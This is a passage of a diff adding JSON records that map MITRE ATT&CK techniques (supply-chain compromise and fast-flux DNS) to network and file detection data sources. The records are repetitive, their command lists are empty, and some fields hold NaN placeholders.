(e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1195.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1195.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1195.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + 
"external_reference": [NaN + ] + }, + { + "technique_id": "T1568.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as 